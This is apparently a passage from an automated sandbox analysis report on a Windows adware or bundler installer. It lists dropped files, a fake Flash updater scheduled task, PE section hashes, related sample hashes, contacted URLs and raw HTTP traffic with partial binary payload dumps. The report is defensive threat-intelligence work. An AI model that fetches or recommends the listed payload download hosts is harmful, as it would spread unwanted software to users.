    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\prepreinstaller_win[1].exe (20400 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsq21.tmp (20400 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsf1F.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsy1D.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (60 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso12.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj1A.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QXGRCP0F\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsvB.tmp\inetc.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GJ6ZM961\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst19.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsqC.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GJ6ZM961\cmmdWriter[1].exe (3656 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Uninstall.exe (4152 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QXGRCP0F\vos[1].htm (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (90 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nssF.tmp (3656 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst10.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\setup[1].exe (128293 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsmD.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsp17.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsbA.tmp (13911 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\Validate[1].exe (4152 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsg20.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\LRP8nPI[1].exe (9352 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsr22.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\f9626892-7a78-3199-abd2-97bbce96297b\adv_128.exe (1188412 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi4.tmp\inetc.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu5.tmp (8184 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GJ6ZM961\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsf7.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QXGRCP0F\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso2.tmp (7384 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk6.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsl8.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tmp25.tmp (718712 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tmp24.tmp.exe (275838 bytes)
    %WinDir%\Tasks\Adobe Flash Player Updater.job (830 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

No information is available.

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text409623462235524.513989d64b6ac6eb1aa41e38f6cc8798b652e
.rdata28672449646083.59163f179218a059068529bdb4637ef5fa28e
.data36864377442410243.26654af685ae5a632e08acd6c90a62cdfc3bb
.ndata3813376179814400d41d8cd98f00b204e9800998ecf8427e
.rsrc5611520173620482.02827da7a0b9d9567037dd7f36744d830319f

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:


Total found: 54
8002fc0d24128006d3d5381415ef9a4a
5787e3b1bc2fa34257cae258da777db5
6683a4b47a46d8fc259d765f6fdce9cc
e74b5a8b167fc8c7a9c396ae1a73093a
72f4a7184e46d99d5be4bfdddae0d514
b530e72eb9a095029f2e55b7305eb813
4f0cbaf64b2ebef09588dcd494daee69
5192c3af97a4752e8bd7c2909355edd7
56872bfc01badd5675c92f84b312b811
e6f4a5f15fa0073abdff4174cd6dea15
109debf147b07c65b68b5d2584df90ce
a5b36912e4ed7e7c2d48bc17ea03f9d9
d3ec96737a50aef3db9c736f2f883938
9449dffea7406c80e4dc276c922b3c8c
6875fc9e7774e2e512d01e8befd22db5
4500b18b0ca5f57fe922a113253cc36c
2f0443a8a710bc8c229112149ed4d824
8b010c94685afe127180ef030b63cf8e
fd5797de1ea0fadb3e595cd28cfbdd93
a6044e2b133e09fc416a6d11bd02ab1d
5923fba5b478bea8809513e03605780b
57b308425604a3830b81e347802bf1b9
bf6250072014b593722f7dd9b12e54f2
4d1c4e9b1e39a709e8a4900719b78b82
0acf1aa93cfa9028a4cca637074f3a37

Network Activity

URLs

URL IP
hxxp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com/54.225.244.49
hxxp://download-servers.com/SysInfo/Validate.exe95.211.189.17
hxxp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe54.230.93.5
hxxp://cds.c5z6s5a3.hwcdn.net/crcb/123/installer.exe
hxxp://ipgeoapi.com/107.21.106.96
hxxp://cds.c5z6s5a3.hwcdn.net/data.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=3&rnd=6474
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003266&default=ie&ver=107&crtnm=OralTeams&rnd=2429
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=100&n=install_browser_start_async&ibic=951432958192de010e9b45488dbf5014&rnd=3804
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=250&n=install_browser_downloading&ibic=951432958192de010e9b45488dbf5014&rnd=3707
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=270&n=install_browser_all_thread_created_success&ibic=951432958192de010e9b45488dbf5014&rnd=3065
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.004
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.002
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.001
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.003
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.005
hxxp://drz432f7yeokb.cloudfront.net/prepreinstaller_win.exe216.137.61.180
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=310&n=install_browser_all_thread_ended_success&ibic=951432958192de010e9b45488dbf5014&rnd=5632
hxxp://drz432f7yeokb.cloudfront.net/SilentInstaller_dotnet4.exe216.137.61.180
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=360&n=install_browser_all_files_in_place&ibic=951432958192de010e9b45488dbf5014&rnd=3775
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=106&os=XP32&browser=&campaign=003040&browserver=106&country=&error=na&action=mutex_already_exists&report=cberr&rnd=1906
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=410&n=install_browser_install_ch_success&ibic=951432958192de010e9b45488dbf5014&rnd=4473
hxxp://json.lxhwspv.com/?adv_id=128&domain=LxHWSpv.com&dotnet=4&event=2&file=installer&ip=52.1.45.42:80&pub_id=353&s=1&offer_version=1.8&dotnet=4&osver=5.1&lang=en
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=480&n=install_browser_end_success&ibic=951432958192de010e9b45488dbf5014&rnd=8733
hxxp://cds.c5z6s5a3.hwcdn.net/data.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=4&rnd=8792
hxxp://djapp.info/?file=flash
hxxp://d22nes4susdva1.cloudfront.net/iqa/install_flash_player_ppapi.exe216.137.61.58
hxxp://ext.internetquickaccess.com/extensions/internetquickaccess/updates.php?id=pcjnhdkacfipfoicilllfabpbghiegpn&os=win&arch=x86&nacl_arch=x86-32&prod=chromiumcrx&prodchannel=unknown&prodversion=45.0.2433.0&lang=en-US&x=id=pcjnhdkacfipfoicilllfabpbghiegpn&v=0.0.0.0&uc108.59.81.209
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=360&n=install_browser_all_files_in_place&ibic=951432958192de010e9b45488dbf5014&rnd=377554.231.1.148
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.00569.16.175.42
hxxp://dl.staticclientstorage.com/69/all/cp/row/setup.exe69.16.175.10
hxxp://json.lxhwspv.comhxxp://json.lxhwspv.com/?adv_id=128&domain=LxHWSpv.com&dotnet=4&event=2&file=installer&ip=52.1.45.42:80&pub_id=353&s=1&offer_version=1.8&dotnet=4&osver=5.1&lang=en
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=270&n=install_browser_all_thread_created_success&ibic=951432958192de010e9b45488dbf5014&rnd=306554.231.1.148
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=250&n=install_browser_downloading&ibic=951432958192de010e9b45488dbf5014&rnd=370754.231.1.148
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=410&n=install_browser_install_ch_success&ibic=951432958192de010e9b45488dbf5014&rnd=447354.231.1.148
hxxp://mystats.rgbdomsrv.com/installer.gif?action=started&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003266&default=ie&ver=107&crtnm=OralTeams&rnd=242954.231.12.132
hxxp://logs.rgbdomsrv.com/data.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=4&rnd=879269.16.175.42
hxxp://events.lxhwspv.comhxxp://events.lxhwspv.com/?p=cHViX2lkPTM1MyZzZXR1cF9pZD0xJmV4dHJhX3BhcmFtcz1TaWxlbnRJbnN0YWxsZXIgZ2xvYmFsIHN0YXJ0JmV2ZW50PTExJnNpZD02NjYmbWFjPTc3NyZhZHZfaWQ9MTI4JmJpdmVyc2lvbj0xLjg=
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.00169.16.175.42
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=100&n=install_browser_start_async&ibic=951432958192de010e9b45488dbf5014&rnd=380454.231.1.148
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.00369.16.175.42
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.00469.16.175.42
hxxp://livestatscounter.com/Generic/vos.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=95.211.189.16
hxxp://err.rgbdomsrv.com/utility.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=106&os=XP32&browser=&campaign=003040&browserver=106&country=&error=na&action=mutex_already_exists&report=cberr&rnd=190654.231.1.148
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=310&n=install_browser_all_thread_ended_success&ibic=951432958192de010e9b45488dbf5014&rnd=563254.231.1.148
hxxp://www.djapp.info/?file=flash52.1.45.42
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.00269.16.175.42
hxxp://www.djapp.info/?file=bundle&v=252.1.45.42
hxxp://livestatscounter.com/SysInfo/validator/timer.php95.211.189.16
hxxp://logs.rgbdomsrv.com/data.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=3&rnd=647469.16.175.42
hxxp://dl.randkeygen.com/crcb/123/installer.exe69.16.175.10
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=480&n=install_browser_end_success&ibic=951432958192de010e9b45488dbf5014&rnd=873354.231.1.148
d20ssor9owizgr.cloudfront.net216.137.61.211
www.google.com173.194.113.209
s3.amazonaws.com

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /crossbrowse/ie/107/ie.zip.001 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: zip.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Thu, 29 Oct 2015 07:31:07 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1441008912"

Last-Modified: Mon, 31 Aug 2015 08:15:12 GMT

Cache-Control: max-age=35167

Content-Length: 8244985

Content-Type: text/plain; charset=UTF-8

X-HW: 1446103867.dop018.am4.t,1446103867.cds046.am4.c

PK........l..G...nd.T.d.T.....chrome.packed.7z7z..'.....T...T.............*..F......8%D.cT(g.....,r...E^<5....S$<....Z..*...7&.o.,.a&......%...1..5...m...h..=w.|.a.a.Q.{.<..:..9Q,>n...k.....~..aJ.._...KD.V...7.>..3....d......)..6.H..RN...:.....FU.!..j...9....L.&.2.a........ .E.s'T.......vD.z)..}..-.. .&.vF}.$.z.......lw.>..!...'.a..|...L....09E..Y8^.s.O\..C..%.......d.VD....W..d.'..6%...l.7Gk.<..I...5...d !......wT...d...H..7v.E.......{.p.]`.......~w84.rj......;...).q.k..G...........zL...{....>.."........"q..k[.f...F{8...s..c>[69..|...q].(.S..~..1z..>.!AT&i.}....YJ....\i....o..(...4.5.......h|.......6.!...4.p[....@.m.. ^&...A..&E..V.]...T=.v]W.l=A=y.T....R.'f.....60..MR...k...c.1."..jw.7C.N...b....@...@....%..%*!5............iW*y..*......E...D....6....3.P....2.....} .'..!...cG.m...Z.]%{.QZ./e.V-C.a.X.aQ?.....S..1...:.T..C*..hKH....(...aH.r..;..^.l.ikR.X..8..._...^T{B@..'.tga.3."..<. ...........$c9......... .~)/..%.2{...X&.W.....>...bh.L.....U.-.Vf......r..d..9. ..k.'.M...J...v...rU..`3...SWX...G1.`....{.....8.~..x..Q...g.._...1.9.......f8..#p..............]...E.(....J....(H.h..6@'.hc.5....}.1>{..6/.R.....(X.k.<....\.....:p...u..L.....h...K...vaK./.O........'|...8..2...{..9....."&.......Z..K.eJ..4e..)v..[...J$.e........5.G......X..@.o.^Y...%....._.n.:...\......H...0,.f.E...*M.F.f.R.lJ*,...S.....FE*'b.#V.@........a=._.....W... .}.....p.~..(>.....E.1k....3k....F..[.T...,N...............Y7.......G[....rH).E......[.5..K..Q..J#8.-.@.]<eh........2a.c.8...Z....O.....z..2c

<<< skipped >>>

GET /extensions/internetquickaccess/updates.php?id=pcjnhdkacfipfoicilllfabpbghiegpn&os=win&arch=x86&nacl_arch=x86-32&prod=chromiumcrx&prodchannel=unknown&prodversion=45.0.2433.0&lang=en-US&x=id=pcjnhdkacfipfoicilllfabpbghiegpn&v=0.0.0.0&uc HTTP/1.1

Host: ext.internetquickaccess.com

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2433.0 Safari/537.36

Accept-Encoding: gzip, deflate, sdch

Accept-Language: en-US,en;q=0.8

HTTP/1.1 200 OK

Server: nginx

Date: Thu, 29 Oct 2015 07:32:20 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.5.28-1~dotdeb 7.1

Content-Encoding: gzip

df.............P.R.0.....T!.W.c9]..>@>.e.......G8.4.P\......]...\".........)8..r~x......L..jl*N/..............s:...SA.$se..t....R..Q......-....e..1.4.Q..D.B..I... \T.../....j"U...........j..W.b...........h:..^...m..=....v..G.....0..HTTP/1.1 200 OK..Server: nginx..Date: Thu, 29 Oct 2015 07:32:20 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.5.28-1~dotdeb 7.1..Content-Encoding: gzip..df.............P.R.0.....T!.W.c9]..>@>.e.......G8.4.P\......]...\".........)8..r~x......L..jl*N/..............s:...SA.$se..t....R..Q......-....e..1.4.Q..D.B..I... \T.../....j"U...........j..W.b...........h:..^...m..=....v..G.....0..

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 115

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"4958\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Thu, 29 Oct 2015 07:30:52 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 115

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"4959\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Thu, 29 Oct 2015 07:30:53 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 115

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"4960\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Thu, 29 Oct 2015 07:30:53 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Thu, 29 Oct 2015 07:30:53 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 115

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"4961\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Thu, 29 Oct 2015 07:30:53 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Thu, 29 Oct 2015 07:30:53 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}..

GET /69/all/cp/row/setup.exe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: dl.staticclientstorage.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Thu, 29 Oct 2015 07:31:02 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1441951687"

Last-Modified: Fri, 11 Sep 2015 06:08:07 GMT

Cache-Control: max-age=905

Content-Length: 1998408

Content-Type: application/x-msdownload

X-HW: 1446103863.dop004.fr7.t,1446103862.cds030.fr7.c

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..S............F.>.%...F.......F...Z.....e...............b.C...o.K.......r.......................:.......v.......?.....Rich............PE..L...&L.U............................./.......0....@..................................x....@................................. I...........A...........v..H............3..8...............................@............0...............................text...T........................... ..`.rdata..j*...0...,..................@..@.data....0...`.......F..............@....rsrc....A.......B...0..............@..@.reloc...............r..............@..B........................................................................................................................................................................................................................................................................................................................U...M.V3.;.tb.A.;.t[.p..q..q..q..P.;.t.....Q0..0....0.p..p..p .p8.p<.@......Hl.HP.HL....................3.^]........^]..........U...M.3.;.t..A.;.t.Q.P(.P,.P0.^...]........]....U...M.W..tt.y...tmSV.u...y.3..........C..0}......t....|....~.^[....._]....G4..t.9w$t.P.A(.I$P...M.....G4....Q._..w$.X...^[_]........_]..........U...E.S3.;........81.......}.8......V.u.;.u.^.C.[]....^.9^ u..F ` @..^(9^$u..F$. @..F(.N Wh....j.P.......;.u._^.....[]....U.R.~.V._4.........t..F(.N$WP......F....._^..[]........[].......

<<< skipped >>>

GET /crossbrowse/ie/107/ie.zip.005 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: zip.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Thu, 29 Oct 2015 07:31:07 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1441008913"

Last-Modified: Mon, 31 Aug 2015 08:15:13 GMT

Cache-Control: max-age=35166

Content-Length: 8244985

Content-Type: text/plain; charset=UTF-8

X-HW: 1446103867.dop001.am4.t,1446103867.cds046.am4.c

[..Wa<.3.......Y.}S.Q)|.x.P..r._ip`...h.r...@..k.....8..o.D_C.0.h..M...gv......J..g.....a.4..~....A.Y.. .u:7..... i...$.....p...ORP.P... ....._.@......?.F.....8.@..l....{n...XGi......2..........FOqM..N_.}...S*he.I.q.. ..V...=.E....1....M.S.......f3%.?.....Ug.\.}...I..g..w..[....t..yR..DJ3.;.;W...._.....y.:..XZ<..40a.I..A...vUW..,...u"......>..*.....@D...YX.4.......v]...T.$..T.1...2.X..o.X....@.%...n.LL....-..A...n.......uq<.r$..t`M.:c9C..l./....}2.......{.O...7............;...M..x...rwqL.\.. ..b.........*f!..S|..*g...'dl..........eN..km...:.6.....s....n.5..0_r8 D.W...".S/%r.rU..c.......C.v5..C...3..z....\.B.-a..r......|..G..W.....2h..>jSy....Z.........tE...T....R.2...p..Q>...f.fj.#.Z.l....7..h.....>...-..K...<....?....B..........,.....$..~........^..V...Uq.672kCC......i....J....*...K.......0..14....{.Wwf".K.p....;.6.H."6y.q.E~. i.`...hN.....d../\A....hY.$!}3..7.*&.n......Z...Q>W.......`0.q..M..A@*.Y 0..7l"m......0...4..X2.|.C2j.[..K...gu...?.a..s.B.kX......j.t...B@|d.l._.zZ.. ."D(..PD..l?.%..w.....).v,v9m...w........G..C.SU.l7*JlW.....56.....v..{............G..3..0....R......Y.h,u..k.'.....$..&.[.9.. 8..1..DZF....n......l_.......*.R...Q$.3.q\..'...]...k..*..0....^#.|A.v...K...........T.Q.#...^e.c....V\..ysD.Ai^.ly..P.~..lreD.g_.Q.....i..kS.R...f..=9.9..q=D."......-N...C.....%.-..u.....<.qj..:..s......:>.I`.PJ..vQ.K.....o.)qew.K.G....w.....tJ.a4...L.[.......0.0#.),......7....J}*..^`w..Q.h...~e..Ql..*..|}...K.Z.*..'.....|..rp.@_.b..!..R.%....%..m"....W9..$ 1.......VZ..''.1,|..V...

<<< skipped >>>

GET /utility.gif?report=fdata&f=4&c=003266&i=100&n=install_browser_start_async&ibic=951432958192de010e9b45488dbf5014&rnd=3804 HTTP/1.1

Accept: */*

Host: err.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: owm0A2VwZ fAFZKdHlPUMgyuVXafcVEThIOwANcVoEmR4HNOqR6N29k/X6 4LTFJ

x-amz-request-id: 2E1F56F7DA07770A

Date: Thu, 29 Oct 2015 07:31:08 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=4&c=003266&i=250&n=install_browser_downloading&ibic=951432958192de010e9b45488dbf5014&rnd=3707 HTTP/1.1

Accept: */*

Host: err.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: P1UZDwwwBu7nUGDwaryzAhOZ9BlDOflYpb4RhLXY8AFbo0blfvjlHLos7XemjSBb

x-amz-request-id: 895C0BB43350E31C

Date: Thu, 29 Oct 2015 07:31:08 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=4&c=003266&i=270&n=install_browser_all_thread_created_success&ibic=951432958192de010e9b45488dbf5014&rnd=3065 HTTP/1.1

Accept: */*

Host: err.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: ubBXAo6TlDsVKZu70Xqt5Z pbJvHGa1nD4h0k1clEbbm39oJgJpdMS59P9xZNFka

x-amz-request-id: 3F474E13F6253A81

Date: Thu, 29 Oct 2015 07:31:08 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: ubBXAo6TlDsVKZu70Xqt5Z pbJvHGa1nD4h0k1clEbbm39oJgJpdMS59P9xZNFka..x-amz-request-id: 3F474E13F6253A81..Date: Thu, 29 Oct 2015 07:31:08 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=4&c=003266&i=310&n=install_browser_all_thread_ended_success&ibic=951432958192de010e9b45488dbf5014&rnd=5632 HTTP/1.1

Accept: */*

Host: err.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: k5bIf0I8TsFZu J4ql XPkz4iMrFrbXgTVyem4Nq5fEqJZ9 b7w5MzJAeIerNVm

x-amz-request-id: 2A77CADFFF654825

Date: Thu, 29 Oct 2015 07:31:15 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

